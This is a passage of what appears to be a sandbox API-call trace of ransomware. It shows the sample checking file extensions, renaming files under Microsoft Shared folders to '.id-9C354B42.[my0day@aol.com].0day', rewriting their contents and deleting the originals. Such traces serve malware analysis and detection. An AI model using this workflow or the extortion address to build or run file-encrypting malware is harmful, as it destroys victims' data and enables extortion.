[0051.755] lstrlenW (lpString=".xlsx") returned 5 [0051.755] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1 [0051.755] lstrlenW (lpString=".ppt") returned 4 [0051.756] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0051.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.756] lstrlenW (lpString=".zip") returned 4 [0051.756] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0051.756] lstrlenW (lpString=".rar") returned 4 [0051.756] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0051.756] lstrlenW (lpString=".bz2") returned 4 [0051.756] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0051.756] lstrlenW (lpString=".7z") returned 3 [0051.756] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0051.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.756] lstrlenW (lpString=".dbf") returned 4 [0051.756] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0051.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.756] lstrlenW (lpString=".1cd") returned 4 [0051.756] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0051.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.756] lstrlenW (lpString=".jpg") returned 4 [0051.756] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0051.756] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0051.756] lstrlenW (lpString="VISFILT.DLL") returned 11 [0051.756] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0051.757] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=2124664) returned 1 [0051.758] CloseHandle (hObject=0x228) returned 1 [0051.758] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll")) returned 0x20 [0051.758] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0051.758] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0051.758] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0051.758] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0051.758] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.759] ReadFile (in: hFile=0x228, lpBuffer=0x3a60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3a60058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.762] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0xace7d, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.762] ReadFile (in: hFile=0x228, lpBuffer=0x3aa0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3aa0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.767] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0051.767] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x1c6b78, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.767] ReadFile (in: hFile=0x228, lpBuffer=0x3ae0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ae0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.027] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.027] WriteFile (in: hFile=0x228, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0052.132] SetEndOfFile (hFile=0x228) returned 1 [0052.133] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3ed2068 [0052.136] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.136] WriteFile (in: hFile=0x228, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.138] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0xace7d, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.138] WriteFile (in: hFile=0x228, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.140] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x1c6b78, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.140] WriteFile (in: hFile=0x228, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.141] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0052.141] CloseHandle (hObject=0x228) returned 1 [0052.141] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.141] lstrlenW (lpString=".doc") returned 4 [0052.141] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0052.141] lstrlenW (lpString=".docx") returned 5 [0052.141] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0052.141] lstrlenW (lpString=".pdf") returned 4 [0052.141] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0052.142] lstrlenW (lpString=".xls") returned 4 [0052.142] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0052.142] lstrlenW (lpString=".xlsx") returned 5 [0052.142] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0052.142] lstrlenW (lpString=".ppt") returned 4 [0052.142] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0052.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.142] lstrlenW (lpString=".zip") returned 4 [0052.142] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0052.142] lstrlenW (lpString=".rar") returned 4 [0052.142] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0052.142] lstrlenW (lpString=".bz2") returned 4 [0052.142] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0052.142] lstrlenW (lpString=".7z") returned 3 [0052.142] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0052.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.142] lstrlenW (lpString=".dbf") returned 4 [0052.142] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0052.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.142] lstrlenW (lpString=".1cd") returned 4 [0052.142] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0052.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.142] lstrlenW (lpString=".jpg") returned 4 [0052.142] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0052.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.142] lstrlenW (lpString=".doc") returned 4 [0052.142] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0052.142] lstrlenW (lpString=".docx") returned 5 [0052.142] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0052.142] lstrlenW (lpString=".pdf") returned 4 [0052.142] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0052.142] lstrlenW (lpString=".xls") returned 4 [0052.142] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0052.142] lstrlenW (lpString=".xlsx") returned 5 [0052.143] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0052.143] lstrlenW (lpString=".ppt") returned 4 [0052.143] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0052.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.143] lstrlenW (lpString=".zip") returned 4 [0052.143] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0052.143] lstrlenW (lpString=".rar") returned 4 [0052.143] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0052.143] lstrlenW (lpString=".bz2") returned 4 [0052.143] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0052.143] lstrlenW (lpString=".7z") returned 3 [0052.143] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0052.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.143] lstrlenW (lpString=".dbf") returned 4 [0052.143] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0052.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.143] lstrlenW (lpString=".1cd") returned 4 [0052.143] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0052.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.143] lstrlenW (lpString=".jpg") returned 4 [0052.143] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0052.143] lstrcmpiW (lpString1=".FLT", lpString2=".0day") returned 1 [0052.143] lstrlenW (lpString="JPEGIM32.FLT") returned 12 [0052.143] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0052.502] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=241024) returned 1 [0052.502] CloseHandle (hObject=0x1d8) returned 1 [0052.502] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt")) returned 0x20 [0052.502] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.502] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0052.502] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.502] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.502] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0052.503] GetLastError () returned 0x0 [0052.503] ReadFile (in: hFile=0x1d8, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x3ad80, lpOverlapped=0x0) returned 1 [0052.517] WriteFile (in: hFile=0x190, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x3ad90, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0x3ad90, lpOverlapped=0x0) returned 1 [0052.521] ReadFile (in: hFile=0x1d8, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.521] WriteFile (in: hFile=0x190, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.521] SetEndOfFile (hFile=0x190) returned 1 [0052.521] CloseHandle (hObject=0x190) returned 1 [0052.521] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.521] SetEndOfFile (hFile=0x1d8) returned 1 [0052.523] CloseHandle (hObject=0x1d8) returned 1 [0052.524] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.524] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt")) returned 1 [0052.524] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.524] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.524] lstrlenW (lpString=".doc") returned 4 [0052.524] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0052.524] lstrlenW (lpString=".docx") returned 5 [0052.524] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0052.524] lstrlenW (lpString=".pdf") returned 4 [0052.524] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0052.524] lstrlenW (lpString=".xls") returned 4 [0052.524] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0052.524] lstrlenW (lpString=".xlsx") returned 5 [0052.524] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0052.524] lstrlenW (lpString=".ppt") returned 4 [0052.524] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0052.524] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.524] lstrlenW (lpString=".zip") returned 4 [0052.524] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0052.524] lstrlenW (lpString=".rar") returned 4 [0052.524] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0052.524] lstrlenW (lpString=".bz2") returned 4 [0052.525] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0052.525] lstrlenW (lpString=".7z") returned 3 [0052.525] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0052.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.525] lstrlenW (lpString=".dbf") returned 4 [0052.525] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0052.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.525] lstrlenW (lpString=".1cd") returned 4 [0052.525] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0052.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.525] lstrlenW (lpString=".jpg") returned 4 [0052.525] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0052.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.525] lstrlenW (lpString=".doc") returned 4 [0052.525] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0052.525] lstrlenW (lpString=".docx") returned 5 [0052.525] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0052.525] lstrlenW (lpString=".pdf") returned 4 [0052.525] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0052.525] lstrlenW (lpString=".xls") returned 4 [0052.525] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0052.525] lstrlenW (lpString=".xlsx") returned 5 [0052.525] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0052.525] lstrlenW (lpString=".ppt") returned 4 [0052.525] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0052.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.525] lstrlenW (lpString=".zip") returned 4 [0052.525] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0052.525] lstrlenW (lpString=".rar") returned 4 [0052.525] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0052.525] lstrlenW (lpString=".bz2") returned 4 [0052.525] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0052.525] lstrlenW (lpString=".7z") returned 3 [0052.525] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0052.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.526] lstrlenW (lpString=".dbf") returned 4 [0052.526] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0052.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.526] lstrlenW (lpString=".1cd") returned 4 [0052.526] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0052.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.526] lstrlenW (lpString=".jpg") returned 4 [0052.526] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0052.526] lstrcmpiW (lpString1=".CGM", lpString2=".0day") returned 1 [0052.526] lstrlenW (lpString="MS.CGM") returned 6 [0052.526] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0052.526] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=1908) returned 1 [0052.526] CloseHandle (hObject=0x1d8) returned 1 [0052.526] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm")) returned 0x20 [0052.526] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.526] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0052.526] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.527] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.527] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0052.527] GetLastError () returned 0x0 [0052.527] ReadFile (in: hFile=0x1d8, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x774, lpOverlapped=0x0) returned 1 [0052.530] WriteFile (in: hFile=0x190, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0x780, lpOverlapped=0x0) returned 1 [0052.530] ReadFile (in: hFile=0x1d8, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.530] WriteFile (in: hFile=0x190, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0052.531] SetEndOfFile (hFile=0x190) returned 1 [0052.531] CloseHandle (hObject=0x190) returned 1 [0052.531] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.531] SetEndOfFile (hFile=0x1d8) returned 1 [0052.532] CloseHandle (hObject=0x1d8) returned 1 [0052.532] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.532] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm")) returned 1 [0052.532] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.532] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.532] lstrlenW (lpString=".doc") returned 4 [0052.532] lstrcmpiW (lpString1=".doc", lpString2=".CGM") returned 1 [0052.532] lstrlenW (lpString=".docx") returned 5 [0052.532] lstrcmpiW (lpString1=".docx", lpString2="S.CGM") returned -1 [0052.532] lstrlenW (lpString=".pdf") returned 4 [0052.532] lstrcmpiW (lpString1=".pdf", lpString2=".CGM") returned 1 [0052.532] lstrlenW (lpString=".xls") returned 4 [0052.532] lstrcmpiW (lpString1=".xls", lpString2=".CGM") returned 1 [0052.532] lstrlenW (lpString=".xlsx") returned 5 [0052.532] lstrcmpiW (lpString1=".xlsx", lpString2="S.CGM") returned -1 [0052.532] lstrlenW (lpString=".ppt") returned 4 [0052.532] lstrcmpiW (lpString1=".ppt", lpString2=".CGM") returned 1 [0052.532] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.532] lstrlenW (lpString=".zip") returned 4 [0052.532] lstrcmpiW (lpString1=".zip", lpString2=".CGM") returned 1 [0052.532] lstrlenW (lpString=".rar") returned 4 [0052.532] lstrcmpiW (lpString1=".rar", lpString2=".CGM") returned 1 [0052.533] lstrlenW (lpString=".bz2") returned 4 [0052.533] lstrcmpiW (lpString1=".bz2", lpString2=".CGM") returned -1 [0052.533] lstrlenW (lpString=".7z") returned 3 [0052.533] lstrcmpiW (lpString1=".7z", lpString2="CGM") returned -1 [0052.533] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.533] lstrlenW (lpString=".dbf") returned 4 [0052.533] lstrcmpiW (lpString1=".dbf", lpString2=".CGM") returned 1 [0052.533] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.533] lstrlenW (lpString=".1cd") returned 4 [0052.533] lstrcmpiW (lpString1=".1cd", lpString2=".CGM") returned -1 [0052.533] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.533] lstrlenW (lpString=".jpg") returned 4 [0052.533] lstrcmpiW 